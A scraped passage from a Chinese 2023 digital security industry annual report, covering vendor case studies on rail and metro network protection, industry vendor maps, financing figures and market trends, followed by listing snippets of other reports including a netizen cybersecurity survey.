LTE、无线 4G、5G 网络回传至地面,实现数据接入、数据处理、数据分析、数据显示等功能,同时将相关信息回显至司机室,在此过程中需要考虑车载系统车地通信的安全性。某市轨道交通列车 TCMS 系统,负责对整列车各个子系统进行监测、故障诊断,以及为旅客提供信息服务。该系统会将车载系统的设备状态与故障数据通过主控制单元传输到司机室的显示屏并记录下来,让司机及时掌握车辆的运行状况,为了提升列车在线状态监测,将PHM数据通过车地无线通道进行落地,将相关数据传输到地面控制中心,同时保证地面系统被网络病毒感染后不会蔓延到列车上。【解决方案】分别在列车车头和车尾车载网络层设备,与无线系统及与车载外部其他系统之间部署车载防火墙,保障车地系统、车载系统与外部系统之间安全通信,实现车载业务系统的边界防护。分别在列车车头和车尾车载网络层设备旁路部署车载监测审计系统,车载监测审计系统提供车载通信网络监测、协议分析和安全审计功能。实现车载资产可知、威胁可视,能够快速定位识别网络中的异常、攻击行为,并实时告警;同时记录所有网络通信行为,为车载系统的安全事故调查提供坚实的基础。66 图 37TCMS 系统网络安全解决方案车载防火墙存活状态监测:车载防火墙通过 TRDP 协议定时发送存活数据值给车载主机,由车载主机判断安全设备的存活状态,能够及时的将设备状态信息展示在司机室。车载防火墙时钟同步:车载防火墙接收车载主机发送的携带时钟信息的TRDP协议报文,进行时钟同步。确保在发生攻击、或威胁时方便关联追踪溯源。车载防火墙告警推送:车载防火墙将产生的告警通过 TRDP 协议推送给车载主机,车载主机会将告警信息推送至司机室,由司机依照告警类型、告警级别及告警内容进行相关处置。车载防火墙告警同时推送至安全日志管理系统进行展示和分析。车载防火墙运维管理:通过车辆运维系统对车载防火墙进行运行维护,车辆运维系统与车载防火墙之间建立基于 HTTPS 及 SSH 访问的加密通道,实现车载防火墙的安全运维管理。【用户评价】在推动车载以太网快速应用落地过程中,为车载的 TCMS 系统安全稳定运行提供安全防护保障;能够对 TRDP 安全通信协议等进行深度的解析防护,有效的防止列车系统遭受攻击和网络病毒感染;直观的展示车载网络安全的威胁,中国数字安全产业年度报告 202367提高对安全威胁的应急响应能力,形成动态防御、监测预警、响应处置的安全运营机制,为车载系统的安全事故调查提供坚实的基础;实现事前预警、事中告警、事后审计的安全运维管理功能,提升车载网络安全的应急处理能力和管控能力。68某地铁集团 PSCADA 系统安全改造试点示范项目案例北京威努特技术有限公司【项目需求】经过对某市地铁线路的评估调研以及和业主深入的沟通,本次项目建设重点应满足以下需求:(1)通过等级保护测评,并满足国家网络安全部门三级等保要求,满足防范病毒入侵、黑客攻击、对数据有审计功能等技术要求的能力;(2)整改过程中保持 PSCADA 系统既有功能和架构不受影响,串联设备故障情况下应确保业务可用;(3)PSCADA 系统属于典型工业应用场景,应采用工控安全产品;(4)建立安全管理中心,需实现安全设备统一管理、策略统一下发、设备监控等,汇聚交换流量收集与分析、预警,运维全程监控与审计等;(5)应对网络中所有流量进行全面深度威胁检测与分析,强化新型网络攻击检测和分析能力;(6)项目建设不能影响正常行车,需在夜间停电后施工。【技术方案】本项目依据 GB/T 22239-2019信息安全技术 网络安全等级保护基本要求,基于威努特多款白名单安全防护产品,并结合“一个中心、三重防护”的纵深防御思想,构建一套覆盖全面、重点突出、安全合规、持续运行的纵深安全防御体系。安全区域边界在控制中心与车站网络之间、车站变电所 PSCADA 系统与综合监控系统之间冗余部署工业防火墙,进行边界隔离和访问控制。工业防火墙对 PSCADA 系统 DNP 3.0 协议深度解析,建立访问控制白名单和 PSCADA 系统 DNP 3.0 协议白名单,构筑安全“白环境”边界隔离和控制防护体系。工业防火墙所有电口均支持 Bypass,从硬件设计上保证对业务系统“零”影响。中国数字安全产业年度报告 202369安全通信网络在控制中心核心网络旁路部署高级威胁检测系统,接收核心网络交换机镜像流量,采用情报检测、入侵检测、行为检测、人工智能检测、病毒检测、基因检测和沙箱检测等技术,对已知和未知威胁流量进行深度包检测和分析,及时发现潜在的高风险威胁。在控制中心核心网络旁路部署工控安全监测与审计系统,基于对 PSCADA系统 DNP 3.0 协议的深度解析,实时监测网络内是否存在网络攻击、用户违规操作、非法设备接入等,结合“白名单 智能学习”机制实现 PSCADA 系统指令级审计,构筑安全“白环境”通信网络防护体系。安全计算环境在 PSCADA 系统所有工作站部署工控主机卫士,设置程序白名单、网络白名单、外设管控、漏洞安全防护、强制访问控制等功能,锁定、切断恶意代码传播,强化主机层面网络和文件访问控制策略等,构建可信任的工作站级终端安全防护“白环境”。图 38工控主机卫士程序白名单展示安全管理中心通过控制中心旁路部署的统一安全管理平台,对 PSCADA 系统中部署的工业防火墙、高级威胁检测系统、工控安全监测与审计系统、工控主机卫士等进行集中管理和策略统一下发;同时统一安全管理平台具备基于资产的风险分析功能,有效帮助业主提高 PSCADA 系统全面的安全态势感知能力。在控制中心旁路部署日志审计与分析系统,通过采集系统中主机设备、网络设备、安全设备、操作系统、数据库、业务系统的日志信息,对采集到的70不同类型的信息进行标准化处理和实时关联分析,协助安全管理人员从海量日志中迅速准确地识别安全事故,提高全面的安全管理、风险管理能力,同时也满足网络安全法对于安全日志留存 6 个月以上的要求。在控制中心旁路部署安全运维管理系统,统一对 PSCADA 系统下的所有资源设备运营和维护操作进行授权和管理,有效管控地铁运维人员、施工单位、设备厂商和第三方运维人员的操作行为。提供身份鉴别与认证机制,对不同身份用户操作进行严格的审计,从而提高 PSCADA 系统持续的安全运维能力。在控制中心旁路部署数据库审计系统,通过对地铁运维人员、施工单位、设备厂商和第三方运维人员和系统的网络行为进行解析、分析、记录、汇报,实现事前规划预防、事中实时监视、违规行为响应、事后合规报告、事故追踪溯源的目的,从而达成加强内外部网络行为监管、促进核心数据库相关业务的正常运营目标。最后再提供漏洞扫描服务,定期对 PSCADA 系统安全防护措施的有效性进行全面扫描,并对识别出的漏洞给出修复建议,提升业主网络安全风险把控能力。【客户价值】安全合规:采用 2021 版测评模板和扣分算法通过等保三级测评;对 PSCADA 系统“零”影响:除工业防火墙外,其余设备旁路部署;工业防火墙所有端口均支持 Bypass 功能,保证设备故障情况下业务可用性;建立安全管理中心,实现了安全设备统一管理、策略统一下发、设备监控等,汇聚交换流量收集与分析、预警,运维全程监控与审计等目标。【客户评价】威努特深入研究城市轨道交通业务系统,针对性开发了诸多城轨专用网络安全产品,打造了适合城市轨道交通业务特点的一系列网络安全标杆案例,为城市轨道交通筑牢网络安全防线。威努特作为我司技术支撑单位,在以往项目中提供了功能强大的网络安全产品和优质的网络安全技术服务,展示了过硬的专业技术能力和认真积极的工作作风。中国数字安全产业年度报告 2023719、医疗云安全山石网科、深信服、奇安信、天融信、启明星辰移动安全指掌易、奇安信、联软科技、盈高科技物理安全万里红网络边界安全新华三、山石网科、华为、联软科技、奇安信流量安全启明星辰、绿盟科技、新华三、奇安信、斗象科技端点安全奇安信、安天、联软科技、亚信安全、阳途科技网站安全绿盟科技、瑞数信息开发与应用安全默安科技、孝道科技密码数字认证、吉大正元、三未信安网络空间资产测绘聚铭网络、默安科技、魔方安全身份安全数字认证、吉大正元模拟伪装永信至诚、观安信息、默安科技、非凡安全意识与培训咨询与评估安全集成检测与测评北方实验室、深圳网安、赛可达实验室、时代新威安全管理联成科技、聚铭网络、华清信安安全演练绿盟科技、长亭科技、默安科技网络保险嘉韦思数据贮存安全美创科技、亿赛通、安恒信息、安华金和、昂楷科技数据访问安全慧盾安全、天空卫士、慢吉科技信息基础设施保护信息计算环境保护应用场景安全基础与通用技术安全运营数据安全东软、安恒信息、奇安信、深信服、电信安全图 39医疗7210、互联网网络边界安全深信服、天融信、奇安信、启明星辰端点安全安全狗、长亭科技、云弈科技、绿盟科技、安芯网盾、青藤云安全网站安全阿里云、电信安全、光通天下、长亭科技、缔盟云区块链安全通付盾、慢雾科技云安全腾讯安全、阿里云、长亭科技、青藤云安全、白山云移动安全梆梆安全、指掌易物联网安全梆梆安全、信长城开发与应用安全孝道科技、默安科技、云弈科技、棱镜七彩互联网安全顶象科技、威胁猎人、腾讯安全、通付盾办公安全数篷科技、指掌易密码数盾科技、中孚信息网络空间资产测绘360数字安全、默安科技、斗象科技漏洞与补丁管理斗象科技、谋乐科技攻击面收敛埃文科技、亿格云威胁情报微步在线、天际友盟身份安全模拟伪装360数字安全、永信至诚、默安科技零信任腾讯安全、数篷科技威胁检测与响应华清信安意识与培训圣博润安全集成中国通信服务安全演练博智安全、永信至诚、长亭科技、腾讯安全数据贮存安全星瑞格、安华金和数据访问安全天空卫士、明朝万达、亿格云、闪捷信息、数篷科技数据开放安全阿里云、华控清交信息基础设施保护信息计算环境保护应用场景安全基础与通用技术体系框架安全运营数据安全九州云腾、宁盾科技、数字认证、吉大正元、信安世纪芯盾时代、齐治科技图 40互联网 中国数字安全产业年度报告 202373某互联网行业客户移动安全建设案例北京梆梆安全科技有限公司【用户需求】互联网为经济社会发展注入强劲动力的同时,也给世界各国主权、安全、发展利益带来许多新的挑战。侵犯个人隐私、侵犯知识产权、网络犯罪等问题时有发生,网络监听、网络攻击、网络恐怖主义活动等成为全球公害。如何发展互联网、用好互联网、治理互联网,已经成为国际社会面临的共同问题。保障移动端业务安全尽可能降低因网络攻击造成业务系统受影响的安全风险,例如移动端常见的的应用破解、盗版仿冒、恶意扣费、广告推送、植入病毒木马等。同时,能够掌控移动应用侧整体的安全态势,可主动发现潜在安全风险,及时知道谁、什么时间、做过什么样的攻击、攻击是否成功、移动业务系统受影响程度,并且在第一时间内解决遇到的安全问题。企业上下游合作生态安全对于外发的 SDK、API、H5,互联网企业普遍比较关心的安全问题集中在 4个层面:1、是否存在潜在的业务逻辑缺陷,会被利用;2、发布后是否会被破解、逆向分析、盗版等;3、发布后是否会被非授权集成调用,导致管控机制失效;4、发布后是否会遭遇动态运行时攻击。数据管理之安全合规数据安全治理是所有互联网公司最核心的安全需求,也是绝大多数互联网企业高管最为关注的安全问题,其安全目标是要保障企业敏感数据的安全、可控。国家层面的信息安全监管政策从顶层到执行、相互之间构成我国的信息安全监管体系,对互联网企业的生产运营从多方面做出明确要求,强制要求涉及网络运营服务的互联网企业必须进行网络安全法律合规体系建设。74解决企业内部自身安全基于互联网企业的特点,其 BYOD 办公、业务移动化程度较高,保障接入安全、权限管控、内部应用安全、行为监测管控、企业数据安全等成为企业内部安全建设的重点。【解决方案】互联网行业需要从企业内部安全、业务安全、安全合规、供应链安全 4 个维度,构建动态、可持续的移动安全运管体系。业务安全围绕互联网企业 To C 端业务APP,基于SDL框架,通过APP安全设计开发、安全测试、安全加固、安全监测、安全运营等产品技术,确保 To C 应用的安全合规。内部安全可通过 EMM(移动终端管理系统)对内部应用、内部文档、内网访问权限、身份认证、邮箱等进行统一安全管控,企业内部应用主要包括 OA、邮箱、财务、运维等业务系统;通过安全培训,培养和提升员工安全意识。安全合规通过自动化审计工具及人工审计服务,对 To C 端 APP 个人信息获取、权限使用等可能存在的合规问题进行发现与整改。软件供应链安全对于企业外发给第三方的 SDK、小程序代码等,除需要做好安全加固外,还需要通过安全监测手段,实时了解其安全态势,及时发现与处置安全威胁;对于企业集成的第三方 SDK、小程序代码等,在集成前,需对其安全性、合规性进行安全检测,避免因第三方合作机构出现安全问题而影响公司业务。中国数字安全产业年度报告 202375图 41【用户评价】我们非常重视移动端的安全建设,需要具备按需安全防护和快速威胁响应的能力。梆梆安全深耕移动安全领域多年,具备丰富的项目经验,从业务安全、内部安全、合规安全、供应链安全等多角度,覆盖我司核心业务系统,建立动态、可持续的运管体系,基于自动化、平台化的工具模块,进行高度的联动和关联分析,让我司能及时掌握移动端整体安全态势,面向用户输出安全能力,做到增值服务。76第五章数字安全 资本数字安全产业面向的是企业/机构级服务市场,尤其是在国内,与消费级服务相比,存在成长周期较长、市场十分碎片化、销售成本极高、定制化项目过多等困难,扩大规模几乎只能依赖不断拉长产品线。根据这些特点,数世咨询认为较合理的投资理念是“长持有、多赛道、共成长”。摘自中国数字安全产业统计与分析报告(2022)中国数字安全产业年度报告 202377国内的数字安全资本市场,自 2015 年之后连年持续速增,并于 2021 年达到顶峰,股权融资总额超过 150 亿元,融资笔数 180 余次。但在 2022 年出现急剧下滑,股权融资总额约 70 亿元,与 2021 年相比下降 56%。融资笔数接近百余次,与 2021 年相比下降 45%。图 422022 年国内数字安全企业融资金额及数量 图 432016-2022 年国内数字安全资本市场概况在融资热点方面,与 2021 年度相比有了一些变化。隐私计算、安全运营和身份安全暂时退出,攻击面管理、车联网安全跻身,而云原生安全开始与业务安全(API 安全)结合。78图 442022 年国内数字安全行业融资金额排名前十的安全领域重要结论2016 年至 2022 年,国内数字安全资本市场,累计股权融资总额超过590 亿元。2022 年融资市场大幅度下滑的原因,除了三年疫情、国与国争端以及全球经济疲软的大背景之外,数字安全企业的规模扩张和净利润增长始终处于困境,投资回报率普遍偏低,因此投资界对整个产业的良好预期缺乏信心。“长持有、多赛道、共成长”是数世咨询于 2021 年提出的投资理念,基于这一理念来看,主要依靠融资扩大规模以占领市场,之后再设法回归企业良性发展的互联网模式并不适用。中国数字安全产业年度报告 202379第六章数字安全九大态势2023 年,对于数字安全产业的大多数民营企业来说,生存是第一要务。对于整体数字安全产业而言,长期向好,未来可期!数世咨询80一、数字安全时代的到来数世咨询认为,计算机安全、信息安全和网络安全三个时代,可由中华人民共和国计算机信息系统安全保护条例、国家信息化领导小组关于加强信息安全保障工作的意见,和“没有网络安全,就没有国家安全”等国家层面的法规政策和方向指引来划分。而中共中央、国务院印发的数字中国建设整体布局规划,则标志着 2023 年是数字安全时代的开启元年。二、国有化趋势愈加明显安全是一个特殊的领域,机构主体规模越大就越无法做到独善其身,其自身的安全与否直接或间接影响到社会和公共安全,政治和国家安全。只要是事关国计民生的重要领域,就需要从更高的维度来管理和把握。基于这个底层逻辑,未来会见到更多的国资入股或收购民营安全企业。同样也基于这个逻辑,也解释了大型国有企业纷纷成立数科公司,即“数科化”的原因。“未来绝大多数大型数字安全企业都将或多或少的具备国资身份。”-摘自数世咨询中国数字安全产业统计与分析报告(2022)三、集成模式挤压利润与创新空间安全的特殊性决定了国有化的趋势,但同时也带来了数科化,加重了数字安全市场上集成模式的比重。正如报告上文的统计,2022 年度数字安全市场仅有的7%增长,全部来自集成业务。集成的好处在于,为供需双方提供缓冲区,具有政治与经济利益的双重保证等内在价值。但同时,也存在着明显的弊端,即严重挤压原厂商的利润空间,安全企业疲于生存,创新就无从谈起。四、数字安全产业发展形势严峻自数世咨询核心团队开始产业统计工作以来,这是首次公开表示对产业发 中国数字安全产业年度报告 202381展形势的担忧。数字安全市场规模的增速和利润,已经连续二年急速下滑,而且势头难止,很大程度上意味着今年产业规模的停滞,甚至是倒退。对于大多数民营企业而言“生存是第一要务”,尤其是严重依赖融资输血的企业,面临的是生死存亡问题。而对于当下想要创业的人来说,则是“市场有风险,创业需谨慎。”五、国家安全、数字经济为刚需数字安全产业的两大核心驱动力,一是国家安全,二是数字经济。两者互为依赖、互为因果。“以新安全格局保障新发展格局,要坚持发展和安全并重,以安全保发展、以发展促安全”。近两年来由于政治、经济、疫情等内外环境的各种因素影响,产业出现连续下滑的态势,但数字安全产业的刚需是国家安全,是数字经济。因此,虽然出现暂时的疲软停滞,但“长期向好,未来可期”的大趋势不变。六、存量市场与增量市场并发国内用户的数字安全能力或需求呈阶梯状。从拥有丰足的安全预算投入、成体系的安全产品和豪华安全团队的超级用户,到具备基础安全能力水平的一般用户,再到缺人少钱的用户,甚至还有无预算、无工具、无人员的“三无用户”。究其原因,中国各地区、各行业、各组织的经济发展水平差异较大,信息化、数字化程度也参差不齐,数字安全的能力或需求自然也是高低不等。这种阶梯状,意味着国内不仅有对传统安全合规产品的大量需求,即存量客户,主要集中在政府部委和央国企,还会有数字经济驱动下的创新安全产品的广阔发展空间,即增量市场的需求。数字安全行业的未来,将会是合规与创新的双轮驱动。七、一体化解决方案呼声渐强非常注重数字安全体系化建设的用户,以及面临庞杂的数字化运营工作的用户,开始出现摆脱安全产品的“最佳选择”,转向产品和供应商整合的倾向。82因此,集成多种具备某种共性产品的安全平台,即基于平台的一体化解决方案,越来越受到供需双方的高度关注。如云原生应用保护平台 CNAPP、安全可见性/优先级和验证的 SOPV、扩展检测和响应 XDR、零信任访问架构 ZTNA、安全访问服务边缘 SASE,以及数世咨询提出的持续应用安全 CAS、数据访问安全域DASS、一体化端点安全 IES、安全驱动的数据治理 SDDG 等。但由于商业壁垒和体制文化等原因,融合类的一体化解决方案供应侧能力严重不足,往往最终的采购结果会变成总包性质的大集成模式。八、安全运营从共识走向落地安全的动态性、伴生性、系统性和服务性,要求必须引入运营的理念。用户真正需要的是安全能力、安全效果的提升,而不是安全设备、软件等产品的堆砌。在前几年,业界已经取得了安全运营理念的共识。现如今,具备一定数字化水平并拥有独立安全团队的用户,普遍的在开展安全运营工作。一些前瞻性的客户,甚至开始尝试接受远程安全托管运营的模式。根据对甲乙双方实际情况的调研和总结,数世咨询提出安全运营的五要素:工具、人、平台、流程和管理。九、数据安全新方向逐渐明朗2022 年底,中共中央、国务院关于构建数据基础制度更好发挥数据要素作用的意见(简称“数据二十条”),为解决数据要素化最大的难点-数据确权,创造性提出了“淡化所有权、强调使用权,聚焦数据使用权流通”的“三权分置”数据产权制度框架,提供了突破数据确权困境的可能,并“鼓励探索数据流通安全保障技术、标准、方案”。数世咨询认为,未来三到五年的主流数据安全需求,将聚焦在“数据主体可控的有限范围内,即机构内各部门、合作伙伴、供应商、用户”的数据访问场景上。中国数字安全产业年度报告 202383 后序将产业统计分析报告做的真实客观,是一件非常耗费人员、时间和精力的复杂性工作。考虑到商业价值的话,并非一件“划算”的事。但一份能够真实反映客观现状的年度报告,无论是对产业的布局规划,还是对技术的趋势判断,亦或是对创业者、投资人的方向指南,都是极具价值的重要参考资料。尤其是对已经在产业方面有着多年经验积累,并掌握实际工作方法的调研机构而言,更是一件责无旁贷的工作。但如何将产业年度报告做的真实客观?如果仅靠网上搜集资料,找几个业内人士做个访谈,再发个调查表让大家填一填,然后坐在电脑前用公式推导计算,这样的报告肯定水分很大,但的确是一大批报告撰写者的常态。质量高的报告如何做?说出来可能会令人嗤鼻,因为使用的方法也无非上述的发表、访谈和搜集,但区别在于实操。调查表中填写的数据和真实数据是不一样的,访谈几位业内专家和访谈几百位企业经营者是大不一样的。做好调研工作,其实一句话足矣:没有调查就没有发言权。在完成整篇报告的撰写工作之后,看看飞书里拥挤的日程表,意味着数世咨询分析师团队接触过的几百家厂商,访谈过的千余位销售、解决方案、产品经理、创始人虽然辛苦但成就感满满,信息量满满。“摸清家底”,了解现状、提出问题,才能做出合理的规划,辅助高层决策,以更好的解决问题,这是数字领域每一家调研机构的立身之本,也是职责和使命。数世咨询将会同广大业界同仁,不断的将调研工作补充完善,为产业发展、技术进步和战略决策提供有力支撑,为国家安全的保障、为数字经济的发展,贡献自己的力量。北京数字世界咨询有限公司(以下简称数世咨询)是国内数字产业第三方调研咨询机构,主营业务为网络安全产业领域的调查研究、资源对接与行业咨询。在国内网络安全产业的调查研究领域,无论是专业性还是资源丰富性,均处于业界领先地位。调查研究方面,撰写发布过中国数字安全大事记、中国数字安全能力图谱、中国数字安全 100 强、中国数字安全产业统计等业内影响力巨大的公开报告。同时,还为监管机构、国家部委、大型国企等单位提供各种定制化的内部调研报告。资源对接方面,数世咨询目前已对接国内网络安全企业 700 余家,以及 150 余家有网络安全投资业务的资本方,建立了频繁且良好的沟通合作关系,包括共同举办会议活动,投融资对接,安全产品与企业推荐,企业资源整合等。行业咨询方面,经常性的为监管部门、国家部委、安全企业、安全用户、一二级市场投资机构提供建议、企业培训及专家评审等咨询服务。公司地址:北京市东城区鲜鱼口街 90-2 号网安小酒馆官方网站:联系邮箱:

    浏览量42人已浏览 发布时间2024-05-07 90页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 公安三所:2023网民网络安全感满意度调查“网络安全法治社会建设”专题调查报告(41页).pdf

    本报告数据来源于 2023 网民网络安全感满意度调查活动,任何组织和个人引用本报告中的数据和内容须注明来源出处。组委会欢迎有关研究机构合作,深入挖掘调查数据价值,有需要者请与组委会秘书处联系。专家指导.

    浏览量26人已浏览 发布时间2024-04-29 41页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 企鹅有调:2023年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告(32页).pdf

    2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 本报告数据来源于 2023 网民网络安全感满意度调查活动,任何组织和个人 引用本报告中的数据和内容须注明来源出处。组委会欢迎有关研究机构合作,深入挖掘调查数据价值,有需要者请与组委会秘书处联系。报告查询报告查询(总报告及区域、专题、行业报告):网络安全共建网:“网安联”公众号:2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 目目 录录 一、一、前言前言 .1 1 二、研究背景二、研究背景 .1 1 三、研究内容与方法三、研究内容与方法 .3 3 四、数字经济的认知与态度四、数字经济的认知与态度 .6 6(一)近八成受访网民对数字经济有所了解,网络渠道为主要信息获取来源.7(二)数字化为生活带来便捷,民众乐观看待数字经济发展前景.8 五、数字经济的产业特点与影响五、数字经济的产业特点与影响 .1111(一)六成以上受访网民关注数字经济产业发展,生活、工作为主要动因.12(二)智能化是数字经济产业发展的最主要特征.13(三)数字经济深刻改变着网民的生活方式,在拉动消费领域也发挥了重要价值.16(四)多数民众认可数字经济的积极影响,尤其对于实体经济的正向带动价值.19 六、数字经济的挑战与安全风险六、数字经济的挑战与安全风险 .2020(一)数字经济法律法规缺失、市场秩序不规范等问题备受网民关切.21(二)多数网民顾虑隐私泄露和数据安全,数据资产保护需持续完善.22(三)社会治安、隐私安全、财产安全是人工智能面临的三大潜在风险.23 七、数字经济发展与安全挑战的建议七、数字经济发展与安全挑战的建议 .2626(一)加强人才培养与公众数字素养提升.26(二)推动数字基础设施建设与技术创新.27(三)强化数字经济法规与数据治理体系建设.28 2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 1 一、前言 2023 年是我国全面贯彻党的二十大精神的开局之年,我国经济总体回升向好,高质量发展扎实推进,全面建设社会主义现代化国家迈出坚实步伐。建设网络强国是我国重要发展战略,在新时代推动高质量发展的背景下,开展全国网民网络安全感满意度调查别具意义。网民网络安全感满意度调查的宗旨就是以人为本,广大网民是网络活动的直接参与者。调查活动直接面向网民大众,通过问卷调查的方式倾听广大网民对网络安全治理的感受和了解现存的网络安全治理问题,同时也向广大网民宣传网络安全的相关政策、法规和知识,提升公众网络安全素养,自觉抵制网上不良信息和网络违法行为,共同守护好清朗的网络空间。2023 年 9 月,以“网络安全为人民,网络安全靠人民”为活动主题的 2023 网民网络安全感满意度调查活动正式启动,本年度调查活动由全国 135 家网络社会组织及相关机构联合发起,本次调查活动收回问卷总数为 224.7269 万份(主问卷 专题问卷),其中公众网民版为 202.3658 万份,网络从业人员版 22.3611 万份。经过数据清洗后,有效问卷总数为 174.4356 万份,其中,公众网民版 156.0609 万份,网络从业人员版 18.3747 万份。二、研究背景 全球经济数字化转型已是大势所趋,数字经济全面融入到生产生活中。大数据、云计算、人工智能等技术不断取得突破,数2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 2 据资源作为新型关键生产要素,其重要性愈发显著,推动整个社会的生产力和生活方式实现深远变革。2022 年,党的二十大报告提出要促进数字经济和实体经济深度融合,打造具有国际竞争力的数字产业集群;2023 年,中共中央、国务院印发数字中国建设整体布局规划,从顶层设计的高度对数字中国建设作出了整体布局,标志着数字中国建设进入了整体推进的新阶段。与此同时,数字经济对我国 GDP 增长所做贡献不断增加,2022 年,数字经济总规模达 50.2 万亿元,数字经济占 GDP 的比重高达 41.5%1,由此可以看出在整个国民经济中,数字经济具有不可撼动的地位,它已经成为促进我国经济增长新的强劲动力。数字经济在不断发展的同时也产生了许多安全风险,达沃斯世界经济论坛(World Economic Forum)发布的2021 年全球风险报告(The Global Risks Report 2021)指出,网络安全问题、IT 基础设施破坏等数字风险,高居当下及近五年内最严重威胁风险的前列。当前我国经济正处于稳步复苏期和结构调整关键期,也处于经济新旧动能转换之际,如何寻求数字经济发展与安全风险的平衡成为亟待回应的问题。监管、企业、公众需要协同发力,创造有利于创新和企业成长的环境,建设科学有效数据治理体系,在 1 国家互联网信息办公室,数字中国发展报告(2022 年)2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 3 保护个人信息权益的同时促进数据有序、公平、合理利用,实现我国经济社会持续、健康、有序发展。三、研究内容与方法 本次研究旨在了解社会民众对数字经济发展的观点以及数据安全风险方面的感知,主要包含四个方面:一是民众对数字经济的认知与态度,包括受访网民对数字经济的认知、信息获取渠道、数字化场景的感知及态度、对数字经济未来发展的信心等;二是探索数字经济产业特点与影响,包含民众对数字经济产业的感知、数字经济发展对生产生活的影响、人工智能技术的认知与应用情况;三是数字经济的挑战与安全风险,包括讨论数字经济发展中存在的问题、分析数字资产面临的安全挑战,如数据泄露、网络攻击等;最后,针对数字经济发展与安全管理提出政策建议和行动方案。从调研数据来看,受访网民构成分布较为均匀分散,囊括不同类型和特征网民的建议和观点,整体调查样本在网民代表性上具有良好体现,加上调查样本数据庞大、覆盖面广泛,调研结论可推及至全国网民。调研受访网民具体分布如下:性别分布:男性(53.49%),女性(46.51%)2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 4 图 1 受访网民性别分布 年龄分布:19 岁以下(25.88%),20-29 岁(23.07%),30-39 岁(25.21%),40-49 岁(17.86%),50-59 岁(6.80%),60岁及以上(1.18%)。图 2 受访网民年龄分布 2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 5 学历分布:初中及以下(23.04%),高中(12.89%),中专(9.09%),大专(20.83%),本科(30.28%),硕士(2.39%),博士(1.47%)。图 3 受访网民学历分布 职业分布:学生(25.91%),企业/公司工作人员(23.03%),公务员/事业单位/政府工作人员(19.50%),自由职业者(自媒体、小生意、作家等自雇人士)(11.80%),无业/失业/退休人员(10.53%),农林牧渔水利业生产人员(3.95%)等。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 6 图 4 受访网民职业分布 四、数字经济的认知与态度 随着近年来信息技术及应用的飞速发展,数字经济已经成为现代社会发展的重要驱动力,并逐渐成为民众所熟知的概念。调查显示,多数民众对数字经济2有所了解并保持关注。从民众对于数字经济相关信息的获取途径来看,目前主要是通过网络及传统媒体,源自专业教育的比例相对较低。日常生活中,学习、购物、工作等领域的数字化水平较高,多数民众对其喜闻乐见,乐观、淡定、兴奋等正面心态占据主流,少部分人群抱有紧张、恐惧等负面心态。2 针对普通网民的调研中,就数字经济表述给出相对通俗的解释:即数字经济包含产业数字化和数字产业化,涵盖智能制造、电子商务、大数据、物联网、云计算等领域。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 7(一)近八成受访(一)近八成受访网民网民对数字经济有所了解,网络渠道对数字经济有所了解,网络渠道为主要信息获取来源为主要信息获取来源 调研显示,受访网民中对数字经济有一些了解的占比为57.10%,表示非常了解的占比为 20.42%,完全不了解的占比为22.48%。随着全球快速进入数字经济时代,数字经济从概念的提出到如今的广泛应用,人们对其认知逐步加深。图 5 受访网民对数字经济的了解情况 受访网民对于数字经济的了解渠道较为多样,网络渠道占比最高,为 67.30%,其次是电视,占比为 44.34%,报刊排在第三位,占比为 30.94%。与他人交流占比 26.97%,专业教育占比24.47%。网络提高了传播效率的同时,可能存在认知较为碎片化、非系统化的问题,后续可加强数字经济在专业领域的解读。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 8 图 6 受访网民了解数字经济途径分布(二)数字化为生活带来便捷,民众乐观看待数字经济(二)数字化为生活带来便捷,民众乐观看待数字经济发展前景发展前景 数字技术正在加速融入国民生活的各个领域。调研显示,受访网民生活中数字化方式最多的领域为学习,占比 48.50%,其次是购物,占比为 47.50%,工作、社交两个领域占比也超过四成。出行、娱乐、居住等领域的占比明显低于前述四项。民众感受深刻的数字化集中在学习/办公/生产、消除沟通壁垒、便捷购物支付等方面。而在娱乐体验、物业、出行等方面的感受程度较低,有进一步发展空间。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 9 图 7 受访网民对生活各领域数字化的感知情况 网民对于“数字化生活”的感受较为积极,乐观心态占比46.34%,兴奋心态占比 30.28%。随着生活场景中数字化程度的加深,民众也越来越适应数字化的生活,因此呈淡定心态的民众也较多,占比 43.26%。消极心态占比较低,以迷茫为主(24.28%),其次为担忧(18.94%)、紧张(15.01%)。部分网民表示“生活已经被手机牵着走了,没带手机出门寸步难行”“出门办事需要下载各种应用程序,步骤又繁琐,对老年群体不太友好。”极少网民表示对于数字化的恐惧感受(5.80%)。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 10 图 8 受访网民对数字化浪潮所表达的情绪 2024 年政府工作报告提出,要以广泛深刻的数字变革,赋能经济发展、丰富人民生活、提升社会治理现代化水平。调研显示,超过一半(55.15%)的受访网民对数字经济发展前景持有积极乐观看法,期待我国数字经济在国家引领下创造新辉煌。37.57%受访网民较为中立,少量网民(7.28%)表达忧虑,或考虑到数字技术下个人隐私问题和数字鸿沟、就业流失等问题尚未解决。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 11 图 9 受访网民对于当前数字经济发展前景的信心水平 五、数字经济的产业特点与影响 在产业应用方面,数字经济催生了电子商务、在线支付、智能制造、云计算等新型业态和模式,极大地提高了生产效率,改变了消费者的购物习惯和企业的运营方式。调查显示,六成以上受访网民关注数字经济产业发展,民众认为智能化、网络化和数字化是数字经济产业发展的主要特征。数字经济不仅能让民众的生活更加便利、智能,又能引领实体产业创新发展。此外,民众对数字经济对于自身所在行业或组织的影响持乐观态度,认为数字经济正深刻改变着生活、工作和商业模式。2023 